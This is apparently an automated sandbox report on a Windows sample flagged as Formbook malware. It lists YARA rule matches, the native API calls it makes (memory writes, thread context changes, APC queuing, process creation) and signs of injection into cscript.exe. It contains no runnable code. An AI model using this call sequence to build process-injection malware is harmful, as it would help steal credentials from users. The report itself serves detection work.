          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_004181CE NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ADB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ADA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ADAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9560 NtWriteFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ADA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AD9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ADA770 NtOpenThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_004181CE NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_0041827A NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_005781D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00578280 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00578300 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_005783B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_005781CE NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057827A NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_005783AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_004047D3
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_004061D4
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041C0A9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041C1CD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041B992
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041A302
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041C383
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00408C70
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041B4B3
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_0041BD9E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B620A8
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AAB090
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B51002
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A9F900
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B622AE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00ACEBB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B62B28
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AA841F
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AAD5E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00A90D20
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B62D07
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B61D55
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B62EF7
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00AB6E30
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_2_00B61FF1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_0041C0A9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_0041C1CD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_0041B992
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 1_1_0041A302
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0488841F
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0493D466
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_049425DD
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0488D5E0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04942D07
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04870D20
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04941D55
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04942EF7
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0493D616
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04896E30
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0494DFCE
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04941FF1
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0488B090
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_049420A8
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_049428EC
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04931002
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0494E824
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0487F900
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_049422AE
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0492FA2B
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_048AEBB0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0493DBD2
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_049303DA
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_04942B28
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_0057A302
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00568C70
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00568C6B
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00562D90
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00562D87
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 18_2_00562FB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: String function: 0041A0B0 appears 38 times
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: String function: 00A9B150 appears 35 times
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0487B150 appears 45 times
          Source: WXs8v9QuE7.exe, 00000000.00000003.228374222.0000000009AAF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
